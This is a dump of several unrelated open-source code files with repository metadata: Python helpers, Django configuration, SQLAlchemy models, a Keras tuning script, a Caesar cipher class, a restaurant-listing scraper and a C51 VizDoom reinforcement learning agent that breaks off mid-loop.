"[email protected]"
] | |
44f71b6be270f1b19df492c0580443c20b5fea64 | d5c659075525981f5683ebdabcebb6df6429efa4 | /lib/complement.py | c7cb5767abdc9130c5c173830f3a863683e1a778 | [
"MIT"
] | permissive | baifengbai/QA-CivilAviationKG | eb2a955eb1b4eed00a8bee85fb37f5c7ea2d34d7 | 616cb8bf7b381a53be9726fd4a463c55667677d0 | refs/heads/master | 2022-12-09T15:53:20.268370 | 2020-09-10T15:39:34 | 2020-09-10T15:39:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,516 | py | # 问题的填充
import re
import Levenshtein
from lib.regexp import RangeYear, RefsYear
from lib.mapping import map_digits, map_refs
def year_complement(question: str) -> str:
""" 年份自动填充,转换各种表示为数字表示。
例:11年 -> 2011年
两千一十一年 -> 2011年
11-15年 -> 2011年,2012年,2013年,2014年,2015年
13到15年 -> 2013年,2014年,2015年
13年比前年 -> 2013年比2011年
15年比大大前年 -> 2015年比2011年
16年比3年前 -> 2016年比2013年
16年与前三年相比 -> 2016年与2015年,2014年,2013年相比
"""
complemented = question
# 先填充范围
range_years = re.compile(RangeYear).findall(question)
last_year = ''
for (year, gap) in range_years:
year = year.strip('年')
if not gap:
new_year = map_digits(year)
else:
start, end = year.split(gap)
start_year, end_year = int(map_digits(start)), int(map_digits(end))
new_year = ','.join([str(start_year + i) for i in range(end_year - start_year + 1)])
last_year = new_year
complemented = complemented.replace(year, new_year)
# 后填充指代
for i, pattern in enumerate(RefsYear):
ref_years = re.compile(pattern).findall(complemented)
if ref_years:
year = ref_years[0][-1]
new_year = map_refs(year, i, int(last_year))
complemented = complemented.replace(year, new_year)
break
return complemented
def index_complement(question: str, words: list,
len_threshold: int = 4,
ratio_threshold: float = 0.5) -> tuple:
"""对问题中的指标名词进行模糊查询并迭代返回最接近的项.
:param question: 问题
:param words: 查询范围(词集)
:param len_threshold: 最小的有效匹配长度
:param ratio_threshold: 最小匹配率
:return: 首次匹配结果
"""
charset = set("".join(words))
pattern = re.compile(f'([{charset}]+)')
for result in pattern.findall(question):
if len(result) < len_threshold:
continue
scores = []
for word in words:
score = Levenshtein.ratio(word, result)
scores.append(score)
# 得分最高的最近似
max_score = max(scores)
if max_score >= ratio_threshold:
return words[scores.index(max_score)], result
return None, None
| [
"[email protected]"
] | |
c89805f2b8005e92a1594b95d1049d78bddbe0f2 | 4254edac798c604dc59b5d586b52357b75d9e302 | /day7/alvdevops0505/alvdevops0505/urls.py | 242561d038498dd1c909378c56d28c8934155de5 | [] | no_license | casey-smile/P27M01 | 5531c3e5874e9308deebcd90eb6aaf1b91eb42eb | 8fd3255c7785f63d5bc1c81d9703674ffc5fdf39 | refs/heads/master | 2022-09-23T14:28:31.801166 | 2020-05-29T16:23:06 | 2020-05-29T16:23:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 890 | py | """alvdevops0505 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('',include('users.urls', namespace='users')),
path('accounts/', include('accounts.urls', namespace='accounts')),
]
| [
"[email protected]"
] | |
641513afa36e0a025b2386b2d085f86762f8831c | 414e0f17a1da288c5e7e7753eb51e44457480637 | /General/migrations/0002_auto_20190313_1534.py | 713c68f71c7cff04bfc69ae12424b2d9f7e74d5e | [] | no_license | livemonkey1300/ajax | ccb0103535c348cb2cf7190615bc1b696da6d469 | 429d1e6ebb32ef36cf320a9211b1430396e33576 | refs/heads/master | 2020-04-27T14:23:58.523709 | 2019-03-18T20:55:09 | 2019-03-18T20:55:09 | 174,408,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | # Generated by Django 2.1.5 on 2019-03-13 15:34
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('General', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='exchange',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='virtual_machine',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='voip',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"[email protected]"
] | |
5438bf2918f6cb484ba4bfdaf5ceabf6e3a64e9b | e39f5ed824db24444580fabb42a06d8029d403ed | /machine_learning/class_03/lesson_01/mnist-search.py | 9be1204f3b77d45af7a43855106b3dad5f89bc30 | [] | no_license | tepkool01/uw_school | 4a027f10b1b7cd28ad2a64a224bdd0fbaa9c040c | 69490b53c0a1a1c7f4b318a988fe1b1e328e3163 | refs/heads/master | 2023-07-15T04:57:52.688896 | 2021-08-23T21:41:27 | 2021-08-23T21:41:27 | 303,208,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,492 | py | # pip install keras-tuner
import math
import numpy as np
from io import TextIOWrapper
from PIL import Image
from zipfile import ZipFile
trnX = np.zeros((60000, 28, 28), dtype = "float32")
trnY = np.zeros((60000), dtype = "int32")
tstX = np.zeros((10000, 28, 28), dtype = "float32")
with ZipFile("ml530-2021-sp-mnist.zip", "r") as archive:
index = 0
for i in range(trnX.shape[0]):
with archive.open("mnist_trn_images/mnist_trn_" + str(i).zfill(5) + ".png") as file:
img = Image.open(file)
trnX[i] = np.asarray(img)
index = index + 1
with TextIOWrapper(archive.open("mnist_trn.csv", "r")) as file:
header = file.readline()
for i in range(trnY.shape[0]):
trnY[i] = np.int32(file.readline().strip("\r\n").split(",")[1])
index = 0
for i in range(tstX.shape[0]):
with archive.open("mnist_tst_images/mnist_tst_" + str(i).zfill(5) + ".png") as file:
img = Image.open(file)
tstX[i] = np.asarray(img)
index = index + 1
trnX = trnX.reshape(trnX.shape[0], trnX.shape[1] * trnX.shape[2])
tstX = tstX.reshape(tstX.shape[0], tstX.shape[1] * tstX.shape[2])
trnX = trnX / 255
tstX = tstX / 255
from tensorflow import keras
from tensorflow.keras import callbacks, layers, optimizers
from kerastuner.tuners import RandomSearch, Hyperband, BayesianOptimization
class CustomTuner(Hyperband):
def run_trial(self, trial, *args, **kwargs):
batch_size = trial.hyperparameters.values["batch_size"]
kwargs["batch_size"] = batch_size
kwargs["steps_per_epoch"] = math.ceil(0.9 * trnX.shape[0] / batch_size)
super(CustomTuner, self).run_trial(trial, *args, **kwargs)
def build_model(hp):
depth = hp.Int("depth", min_value = 0, max_value = 4, step = 1)
width = hp.Choice("width", values = [ 64, 128, 256, 512 ])
activation = hp.Choice("activation", values = [ "linear", "relu", "sigmoid", "tanh" ])
dropout = hp.Float("dropout", 0, 0.5, step = 0.1)
optimizer = hp.Choice("optimizer", values = [ "adam", "rmsprop", "sgd" ])
learning_rate = hp.Choice("learning_rate", values = [ 0.01, 0.001, 0.0001 ])
batch_size = hp.Choice("batch_size", values = [ 512, 1024, 2048 ])
model = keras.Sequential()
for depth in range(depth):
model.add(layers.Dense(units = width, activation = activation))
model.add(layers.Dropout(dropout))
optimizer = optimizers.Adam
if (optimizer == "rmsprop"):
optimizer = optimizers.RMSprop
elif (optimizer == "sgd"):
optimizer = optimizers.SGD
model.add(layers.Dense(trnY.max() + 1, activation = "softmax"))
model.compile(optimizer = optimizer(learning_rate = learning_rate), loss = "sparse_categorical_crossentropy", metrics = [ "accuracy" ])
return model
#tuner = RandomSearch(build_model,
# objective = "val_accuracy",
# max_trials = 32,
# executions_per_trial = 1,
# directory = "tuning",
# project_name = "random")
#tuner = BayesianOptimization(build_model,
# objective = "val_accuracy",
# max_trials = 32,
# num_initial_points = 8,
# directory = "tuning",
# project_name = "bayesian")
#tuner = Hyperband(build_model,
# objective = "val_accuracy",
# max_epochs = 32,
# hyperband_iterations = 1,
# directory = "tuning",
# project_name = "bandit")
tuner = CustomTuner(build_model,
objective = "val_accuracy",
max_epochs = 32,
hyperband_iterations = 1,
directory = "tuning",
project_name = "bandit")
callbacks = [ callbacks.ReduceLROnPlateau(monitor = "val_accuracy", patience = 2),
callbacks.EarlyStopping(monitor = "val_accuracy", patience = 8, restore_best_weights = True) ]
tuner.search_space_summary()
tuner.search(trnX, trnY, validation_split = 0.1, callbacks = callbacks)
tuner.results_summary()
model = tuner.get_best_models(num_models = 1)[0]
hyperparameters = tuner.get_best_hyperparameters(num_trials = 1)[0].get_config()
print(hyperparameters["values"])
probabilities = model.predict(tstX)
classes = probabilities.argmax(axis = -1)
predictions = open("predictions.csv", "w")
predictions.write("id,label\n")
for i in range(tstX.shape[0]):
predictions.write(str(i).zfill(5) + "," + str(classes[i]) + "\n")
predictions.close()
model.summary()
| [
"[email protected]"
] | |
a31cb5f185c80ea397b6d84e1e2a1d488a88fd68 | a383c318c17b382bc3acad86b106584123ec5cd5 | /tifa/models/product_attr.py | fb9b11ea5d0303b510746f3e2d342138c1d3f67e | [
"MIT"
] | permissive | Jormungendr/tifa | 86f20aa8ca28548a5861c6dcd54ab12840aa0b0c | f703fd27f54000e7d51f06d2456d09cc79e0ab72 | refs/heads/master | 2023-07-13T08:21:26.464652 | 2021-08-24T14:19:52 | 2021-08-24T14:19:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,506 | py | import sqlalchemy as sa
from sqlalchemy.orm import relationship
from tifa.globals import Model
from tifa.models.attr import Attribute, AttributeValue
from tifa.models.product import ProductType, Product, ProductVariant
class AttributeProduct(Model):
__tablename__ = "attribute_product"
__table_args__ = (sa.UniqueConstraint("attribute_id", "product_type_id"),)
id = sa.Column(sa.Integer, primary_key=True)
attribute_id = sa.Column(
sa.ForeignKey("attribute.id"),
nullable=False,
)
attribute = relationship(Attribute)
product_type_id = sa.Column(
sa.ForeignKey("product_type.id"),
nullable=False,
)
product_type = relationship(ProductType)
sort_order = sa.Column(sa.Integer, index=True)
class AssignedProductAttribute(Model):
__tablename__ = "assigned_product_attribute"
__table_args__ = (sa.UniqueConstraint("product_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
product_id = sa.Column(sa.ForeignKey("product.id"), nullable=False)
product = relationship(Product)
assignment_id = sa.Column(
sa.ForeignKey("attribute_product.id"),
nullable=False,
)
assignment = relationship(AttributeProduct)
class AssignedProductAttributeValue(Model):
__tablename__ = "assigned_product_attribute_value"
__table_args__ = (sa.UniqueConstraint("value_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
sort_order = sa.Column(sa.Integer, index=True)
assignment_id = sa.Column(
sa.ForeignKey("assigned_product_attribute.id"),
nullable=False,
)
assignment = relationship(AssignedProductAttribute)
value_id = sa.Column(
sa.ForeignKey("attribute_value.id"),
nullable=False,
)
value = relationship(AttributeValue)
class AttributeVariant(Model):
__tablename__ = "attribute_variant"
__table_args__ = (sa.UniqueConstraint("attribute_id", "product_type_id"),)
id = sa.Column(sa.Integer, primary_key=True)
attribute_id = sa.Column(
sa.ForeignKey("attribute.id"),
nullable=False,
)
product_type_id = sa.Column(
sa.ForeignKey("product_type.id"),
nullable=False,
)
sort_order = sa.Column(sa.Integer, index=True)
attribute = relationship(Attribute)
product_type = relationship(ProductType)
class AssignedVariantAttribute(Model):
__tablename__ = "assigned_variant_attribute"
__table_args__ = (sa.UniqueConstraint("variant_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
variant_id = sa.Column(
sa.ForeignKey("product_variant.id"),
nullable=False,
)
assignment_id = sa.Column(
sa.ForeignKey("attribute_variant.id"),
nullable=False,
)
assignment = relationship(AttributeVariant)
variant = relationship(ProductVariant)
class AssignedVariantAttributeValue(Model):
__tablename__ = "assigned_variant_attribute_value"
__table_args__ = (sa.UniqueConstraint("value_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
sort_order = sa.Column(sa.Integer, index=True)
assignment_id = sa.Column(
sa.ForeignKey(
"assigned_variant_attribute.id",
),
nullable=False,
)
assignment = relationship(AssignedVariantAttribute)
value_id = sa.Column(
sa.ForeignKey("attribute_value.id"),
nullable=False,
)
value = relationship(AttributeValue)
| [
"[email protected]"
] | |
6fa040ec27c8ff99da03fcd41b34c7abf7a93b67 | 391cbb86dc881e9de9bb3b9b0cc15b9199389acb | /python/modularizing/child.py | 94d2c4545ebfa134e03e63fbe19001bacf0d6d6e | [] | no_license | jgreen7773/python_stack | 3291498959de2d289f4b534e5e8643df03375f97 | 2948e467895c18c61f5c91b5c2b80455223a5d63 | refs/heads/master | 2020-07-15T18:12:06.227271 | 2019-09-26T22:37:01 | 2019-09-26T22:37:01 | 205,622,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | import parent
print(locals())
# If we import code from the sub-page to the main page, we don't want
# the code from there to be executed on our main page, so we use...
# something like this:
if __name__ == "__main__":
product = Product([args])
print(product)
print(product.add_tax(0.18)) | [
"[email protected]"
] | |
206aeb7d68e86e28ec22ef45eb51ed4f80dead0f | 3886c78ffed288379a54865ec6e494a514207d0d | /caravantone/view/artist.py | a2cc6e6f37388a036a88955d095390ea26d1f3ea | [] | no_license | Attsun1031/caravantone | 34a2a8b612af7bafc49b063f50953abe469d393b | bc5a9e481649e67f2c631aaf55384a4fce051ba7 | refs/heads/master | 2021-06-11T14:31:43.966237 | 2014-07-20T03:41:08 | 2014-07-20T03:41:08 | 18,760,513 | 0 | 0 | null | 2021-06-01T21:53:28 | 2014-04-14T12:55:19 | JavaScript | UTF-8 | Python | false | false | 1,161 | py | # -*- coding: utf-8 -*-
from flask import request, jsonify
from caravantone import app
from caravantone.view.util import require_login, jsonify_list
from caravantone.model.artist import Artist
from caravantone.es.artist_suggestion import suggest_artist
from caravantone.repository import artist_repository, user_repository
@app.route("/artists", methods=['POST'])
@require_login
def create(user):
"""create new artist data
:param user: current user
:return: Response
"""
artist = artist_repository.find_by_freebase_topic_id(request.form.get('freebase_topic_id'))
if not artist:
artist = Artist(name=request.form.get('name'), freebase_topic_id=request.form.get('freebase_topic_id'))
user.check_artists(artist)
user_repository.save(user)
return jsonify(name=artist.name)
@app.route("/artists/suggest", methods=['GET'])
@require_login
def suggest(user):
"""suggest artist name
:param user: current user
:return: Response
"""
name = request.args.get('name', '')
artists = suggest_artist(name)
return jsonify_list([{'name': artist.name, 'id': artist.artist_id} for artist in artists])
| [
"[email protected]"
] | |
d4703ba2bdb76a23ad5f3eef4f0eb86443e92219 | 93dd16432fcb4b42670f208edf81b2eb29f40d41 | /pycaesarcipher.py | 980eed0fa1ec667cce8da2834d93cf03891ce125 | [
"MIT"
] | permissive | shyams1993/pycaesarcipher | d067f4fda7acdb5f70687d5262a6fbc39d5e3790 | a396f165cc9a103950d060c94e25f7f344e7b257 | refs/heads/master | 2022-06-27T17:28:48.417994 | 2020-05-07T10:05:25 | 2020-05-07T10:05:25 | 261,873,682 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,180 | py | class pycaesarcipher():
'''
DOCSTRING: This class contains the encipher function & decipher function to one of the most simplest substitution Ciphers - "Caesar's Cipher"
'''
def __init__(self):
return None
def caesar_encipher(self,word,shiftkey):
'''
DOCSTRING: Function to encipher a given string using caesar cipher.
\nINPUT: Any string and shiftkey.
\nLOGIC: To encrypt, it uses the basic formula : (character + shiftkey)
\nOUTPUT: The Enciphered string result.
\nUSAGE: First import the CaesarCipher package; Then, create an instance of the class by using a variable to assign & call an instance of the class.
\nSyntax: variable_name = CaesarCipher()
\nThen create another variable to call either the caesar_encipher() method or caesae_decipher() method using two positional arguments : target word/variable, shiftkey
\nSyntax: another_variable = variable_name.caesar_encipher("string",integer)
\n\nThis logic uses ASCII code representation to convert the strings to integers. You can use any string, but this method will convert the string to lowercase and then encipher to maintain uniformity.
'''
word = word.lower()
ciphertext = []
for w in range(len(word)):
x = (ord(word[w]) + shiftkey)
if x > 122:
y = (x-122)+96
ciphertext.append(chr(y))
elif ord(word[w]) == 32:
y = 32
ciphertext.append(chr(y))
else:
ciphertext.append(chr(x))
word = ''.join([str(s) for s in ciphertext])
return word
def caesar_decipher(self,word,shiftkey):
'''
DOCSTRING: Function to decipher a given string using caesar cipher.
\nINPUT: Any string and shiftkey.
\nLOGIC: To decipher, it uses the basic formula : (character - shiftkey)
\nOUTPUT: The deciphered string result.
\nUSAGE: First import the CaesarCipher package; Then, create an instance of the class by using a variable to assign & call an instance of the class.
\nSyntax: variable_name = CaesarCipher()
\nThen create another variable to call either the caesar_encipher() method or caesae_decipher() method using two positional arguments : target word/variable, shiftkey
\nSyntax: another_variable = variable_name.caesar_decipher("string",integer)
\n\nThis logic uses ASCII code representation to convert the strings to integers. You can use any string, but this method will convert the string to lowercase and then decipher to maintain uniformity.
'''
word = word.lower()
plaintext = []
for w in range(len(word)):
x = (ord(word[w]) - shiftkey)
if x>=70 and x < 97:
y = (x-96)+122
plaintext.append(chr(y))
elif ord(word[w]) == 32:
plaintext.append(chr(32))
else:
plaintext.append(chr(x))
word = ''.join([str(s) for s in plaintext])
return word | [
"[email protected]"
] | |
47cc53e4d489c658835626b31746754eba3a8c9b | 361270624816c78772e39efd5dc3269da19fd156 | /test.py | a14298a618e48218120391c19beb2ce733c295d8 | [] | no_license | Dairaku/Scraping | 4f14c741b8a16ca33393fcf146b34e7896b38ab4 | ab39f3542c1fc61148249faac31b5bcc59f76639 | refs/heads/master | 2020-05-27T14:29:10.364824 | 2019-05-26T08:51:38 | 2019-05-26T08:51:38 | 188,660,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,646 | py | #!/usr/bin/env python
# coding: utf-8
import csv
import requests
from urllib.request import urlopen
from bs4 import BeautifulSoup
import ssl
import re
import pandas as pd
import time
base_url = "https://tabelog.com/tokyo/A1304/A130401/rstLst/"
begin_page = 1
end_page = 10
#最終ページの計算用
r_base = requests.get(base_url)
soup_base = BeautifulSoup(r_base.content, 'html.parser')
page_num = begin_page
#csvリストの作成
csvlist = [["store_name", "score", "review_num", "url", "category_name", "reserve_tel", "prefecture", "district", "seat_num", "facebook", "restaurant_tel", "homepage", "open_date"]]
#CSVファイルを開く。ファイルがなければ新規作成する。
f = open("output.csv", "w", encoding="utf_8_sig")
writecsv = csv.writer(f, lineterminator='\n')
while True:
list_url = base_url + str(page_num) + "/"
print(list_url)
# 一覧ページで、ページネーション順に取得
r1 = requests.get(list_url)
soup1 = BeautifulSoup(r1.content, 'lxml')
soup_a_list = soup1.find_all('a', class_='list-rst__rst-name-target')
# 店の個別ページURLを取得
for soup_a in soup_a_list:
item_url = soup_a.get('href')
print(item_url)
r = requests.get(item_url)
soup = BeautifulSoup(r.content, 'lxml')
#点数
try:
score = soup.find("span", class_="rdheader-rating__score-val-dtl").get_text()
print(score)
except:
score="NULL"
pass
print(score)
# 口コミ数
try:
review_num = soup.find("em", class_="num").get_text()
except:
review_num="NULL"
pass
print(review_num)
#情報取得
info = str(soup)
#店舗名
try:
store_name = info.split('display-name')[1].split('<span>')[1].split('</span>')[0].strip()
except:
store_name="NULL"
pass
print(store_name)
#ジャンル名
try:
category_name = info.split('<th>ジャンル</th>')[1].split('<td>')[1].split('</td>')[0].split('<span>')[1].split('</span>')[0].strip()
except:
category_name="NULL"
pass
print(category_name)
#予約電話番号
try:
reserve_tel = info.split('<strong class="rstinfo-table__tel-num">')[1].split('</strong>')[0].strip()
except:
reserve_tel="NULL"
pass
print(reserve_tel)
#都道府県
try:
prefecture = info.split('<p class="rstinfo-table__address">')[1].split('/">')[1].split('</a>')[0].strip()
except:
prefecture="NULL"
pass
print(prefecture)
#区
try:
district = info.split('<p class="rstinfo-table__address">')[1].split('/rstLst/')[1].split('">')[1].split('</a>')[0].strip()
except:
district="NULL"
pass
print(district)
#席数
try:
seat_num = info.split('<th>席数</th>')[1].split('<td>')[1].split('</td>')[0].split('<p>')[1].split('席</p>')[0].strip()
except:
seat_num="NULL"
pass
print(seat_num)
#公式アカウント facebook
try:
facebook = info.split('rstinfo-sns-link rstinfo-sns-facebook')[1].split('<span>')[1].split('</span>')[0].strip()
except:
facebook="NULL"
pass
print(facebook)
#電話番号
try:
restaurant_tel = info.split('<th>電話番号</th>')[1].split('<strong class="rstinfo-table__tel-num">')[1].split('</strong>')[0].strip()
except:
restaurant_tel="NULL"
pass
print(restaurant_tel)
#ホームページ
try:
homepage = info.split('<th>ホームページ</th>')[1].split('<span>')[1].split('</span>')[0].strip()
except:
homepage="NULL"
pass
print(homepage)
#オープン日
try:
open_date = info.split('rstinfo-opened-date">')[1].split('</p>')[0].strip()
except:
open_date="NULL"
pass
print(open_date)
#csvリストに順に追加
csvlist.append([store_name, score, review_num, item_url, category_name, reserve_tel, prefecture, district, seat_num, facebook, restaurant_tel, homepage, open_date])
if page_num >= end_page:
print(csvlist)
break
page_num += 1
# 出力
writecsv.writerows(csvlist)
# CSVファイルを閉じる
f.close()
| [
"[email protected]"
] | |
140b356fa408e4eb413cb2c100895ff01e14c112 | 264cbdc7c2b4091179ba5fbdbb15005f6ac58b9f | /Algos/C51/examples/python/c51_ddqn.py | bb6455d9b4ae5b306ac48462cd633e024bd33c62 | [] | no_license | geeko66/PA2018-2019-KA | e25b49dd71ad4b5b2f3a00624147a9b24151c3d8 | 186d127608c8ea754a6e64836b0347d32cf37da6 | refs/heads/master | 2020-04-15T21:46:42.503444 | 2019-01-16T11:12:12 | 2019-01-16T11:12:12 | 165,046,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,185 | py | #!/usr/bin/env python
from __future__ import print_function
import skimage as skimage
from skimage import transform, color, exposure
from skimage.viewer import ImageViewer
import random
from random import choice
import numpy as np
from collections import deque
import time
import math
import pickle
import json
from keras.models import model_from_json
from keras.models import Sequential, load_model, Model
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, Dense, Flatten, merge, MaxPooling2D, Input, AveragePooling2D, Lambda, Merge, Activation, Embedding
from keras.optimizers import SGD, Adam, rmsprop
from keras import backend as K
from keras.utils import np_utils
from vizdoom import DoomGame, ScreenResolution
from vizdoom import *
import itertools as it
from time import sleep
import tensorflow as tf
from networks import Networks
import sys
# Not needed for the bonseyes's project
def preprocessImg(img, size):
img = np.rollaxis(img, 0, 3) # It becomes (640, 480, 3)
img = skimage.transform.resize(img,size)
img = skimage.color.rgb2gray(img)
return img
class C51Agent:
def __init__(self, state_size, action_size, num_atoms):
# get size of state and action
self.state_size = state_size
self.action_size = action_size
# these is hyper parameters for the DQN
self.gamma = 0.99
self.learning_rate = 0.0001
self.epsilon = 1.0
self.initial_epsilon = 1.0
self.final_epsilon = 0.0001
self.batch_size = 32
self.observe = 2000
self.explore = 50000
self.frame_per_action = 4
self.update_target_freq = 3000
self.timestep_per_train = 100 # Number of timesteps between training interval
# Initialize Atoms
self.num_atoms = num_atoms # 51 for C51
self.v_max = 30 # Max possible score for Defend the center is 26 - 0.1*26 = 23.4
self.v_min = -10 # -0.1*26 - 1 = -3.6
self.delta_z = (self.v_max - self.v_min) / float(self.num_atoms - 1)
self.z = [self.v_min + i * self.delta_z for i in range(self.num_atoms)]
# Create replay memory using deque
self.memory = deque()
self.max_memory = 50000 # number of previous transitions to remember
# Models for value distribution
self.model = None
self.target_model = None
# Performance Statistics
self.stats_window_size= 50 # window size for computing rolling statistics
self.mavg_score = [] # Moving Average of Survival Time
self.var_score = [] # Variance of Survival Time
self.mavg_ammo_left = [] # Moving Average of Ammo used
self.mavg_kill_counts = [] # Moving Average of Kill Counts
def update_target_model(self):
"""
After some time interval update the target model to be same with model
"""
self.target_model.set_weights(self.model.get_weights())
def get_action(self, state):
"""
Get action from model using epsilon-greedy policy
"""
if np.random.rand() <= self.epsilon:
#print("----------Random Action----------")
action_idx = random.randrange(self.action_size)
else:
action_idx = self.get_optimal_action(state)
return action_idx
def get_optimal_action(self, state):
"""Get optimal action for a state
"""
z = self.model.predict(state) # Return a list [1x51, 1x51, 1x51]
z_concat = np.vstack(z)
q = np.sum(np.multiply(z_concat, np.array(self.z)), axis=1)
# Pick action with the biggest Q value
action_idx = np.argmax(q)
return action_idx
def shape_reward(self, r_t, misc, prev_misc, t):
"""
Reward design:
Will be the inverted time in Bonseyes (x = -x) because
the time is the thing we want to minimize, therrefore we
maximize the invert time
"""
# Check any kill count
if misc[0] > prev_misc[0]:
r_t = r_t + 1
if misc[1] < prev_misc[1]: # Use ammo
r_t = r_t - 0.1
if misc[2] < prev_misc[2]: # Loss HEALTH
r_t = r_t - 0.1
return r_t
# save sample <s,a,r,s'> to the replay memory
def replay_memory(self, s_t, action_idx, r_t, s_t1, is_terminated, t):
"""
Used for the replay experience
"""
self.memory.append((s_t, action_idx, r_t, s_t1, is_terminated))
if self.epsilon > self.final_epsilon and t > self.observe:
self.epsilon -= (self.initial_epsilon - self.final_epsilon) / self.explore
if len(self.memory) > self.max_memory:
self.memory.popleft()
# Update the target model to be same with model
if t % self.update_target_freq == 0:
self.update_target_model()
# pick samples randomly from replay memory (with batch_size)
def train_replay(self):
"""
Notes: Update this part to prioritize the experience replay
following the other code. To see!!!
"""
num_samples = min(self.batch_size * self.timestep_per_train, len(self.memory))
replay_samples = random.sample(self.memory, num_samples)
state_inputs = np.zeros(((num_samples,) + self.state_size))
next_states = np.zeros(((num_samples,) + self.state_size))
m_prob = [np.zeros((num_samples, self.num_atoms)) for i in range(action_size)]
action, reward, done = [], [], []
for i in range(num_samples):
state_inputs[i,:,:,:] = replay_samples[i][0]
action.append(replay_samples[i][1])
reward.append(replay_samples[i][2])
next_states[i,:,:,:] = replay_samples[i][3]
done.append(replay_samples[i][4])
z = self.model.predict(next_states) # Return a list [32x51, 32x51, 32x51]
z_ = self.target_model.predict(next_states) # Return a list [32x51, 32x51, 32x51]
# Get Optimal Actions for the next states (from distribution z)
optimal_action_idxs = []
z_concat = np.vstack(z)
q = np.sum(np.multiply(z_concat, np.array(self.z)), axis=1) # length (num_atoms x num_actions)
q = q.reshape((num_samples, action_size), order='F')
optimal_action_idxs = np.argmax(q, axis=1)
# Project Next State Value Distribution (of optimal action) to Current State
for i in range(num_samples):
if done[i]: # Terminal State
# Distribution collapses to a single point
Tz = min(self.v_max, max(self.v_min, reward[i]))
bj = (Tz - self.v_min) / self.delta_z
m_l, m_u = math.floor(bj), math.ceil(bj)
m_prob[action[i]][i][int(m_l)] += (m_u - bj)
m_prob[action[i]][i][int(m_u)] += (bj - m_l)
else:
for j in range(self.num_atoms):
Tz = min(self.v_max, max(self.v_min, reward[i] + self.gamma * self.z[j]))
bj = (Tz - self.v_min) / self.delta_z
m_l, m_u = math.floor(bj), math.ceil(bj)
m_prob[action[i]][i][int(m_l)] += z_[optimal_action_idxs[i]][i][j] * (m_u - bj)
m_prob[action[i]][i][int(m_u)] += z_[optimal_action_idxs[i]][i][j] * (bj - m_l)
loss = self.model.fit(state_inputs, m_prob, batch_size=self.batch_size, epochs=1, verbose=0)
return loss.history['loss']
# load the saved model
def load_model(self, name):
self.model.load_weights(name)
# save the model which is under training
def save_model(self, name):
self.model.save_weights(name)
if __name__ == "__main__":
print("System path")
print(sys.path)
# Avoid Tensorflow eats up GPU memory
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
K.set_session(sess)
game = DoomGame()
# game.load_config("..\..\scenarios\defend_the_center.cfg")
game.load_config("/Users/tesla/Downloads/ViZDoom-master/scenarios/defend_the_center.cfg")
game.set_sound_enabled(True)
game.set_screen_resolution(ScreenResolution.RES_640X480)
game.set_window_visible(False)
game.set_mode(Mode.PLAYER)
game.init()
game.new_episode("./episode_rec/ep1.lmp")
game_state = game.get_state()
misc = game_state.game_variables # [KILLCOUNT, AMMO, HEALTH]
prev_misc = misc
action_size = game.get_available_buttons_size()
img_rows , img_cols = 64, 64
# Convert image into Black and white
img_channels = 4 # We stack 4 frames
# C51
num_atoms = 51
state_size = (img_rows, img_cols, img_channels)
agent = C51Agent(state_size, action_size, num_atoms)
agent.model = Networks.value_distribution_network(state_size, num_atoms, action_size, agent.learning_rate)
agent.target_model = Networks.value_distribution_network(state_size, num_atoms, action_size, agent.learning_rate)
x_t = game_state.screen_buffer # 480 x 640
x_t = preprocessImg(x_t, size=(img_rows, img_cols))
s_t = np.stack(([x_t]*4), axis=2) # It becomes 64x64x4
s_t = np.expand_dims(s_t, axis=0) # 1x64x64x4
is_terminated = game.is_episode_finished()
# Start training
epsilon = agent.initial_epsilon
GAME = 0
t = 0
max_life = 0 # Maximum episode life (Proxy for agent performance)
life = 0
# Buffer to compute rolling statistics
tot_reward_buffer, life_buffer, ammo_buffer, kills_buffer, mavg_score, \
var_score, mavg_ammo_left, mavg_kill_counts, \
mavg_tot_rewards = [], [], [], [], [], [], [], [], []
losses_buffer, epsilon_buffer, stats_store = [], [], []
episode_co = 1
while not game.is_episode_finished():
loss = 0
r_t = 0
a_t = np.zeros([action_size])
# Epsilon Greedy
action_idx = agent.get_action(s_t)
a_t[action_idx] = 1
a_t = a_t.astype(int)
game.set_action(a_t.tolist())
skiprate = agent.frame_per_action
game.advance_action(skiprate)
game_state = game.get_state() # Observe again after we take the action
is_terminated = game.is_episode_finished()
r_t = game.get_last_reward() #each frame we get reward of 0.1, so 4 frames will be 0.4
if (is_terminated):
if (life > max_life):
max_life = life
GAME += 1
life_buffer.append(life)
ammo_buffer.append(misc[1])
kills_buffer.append(misc[0])
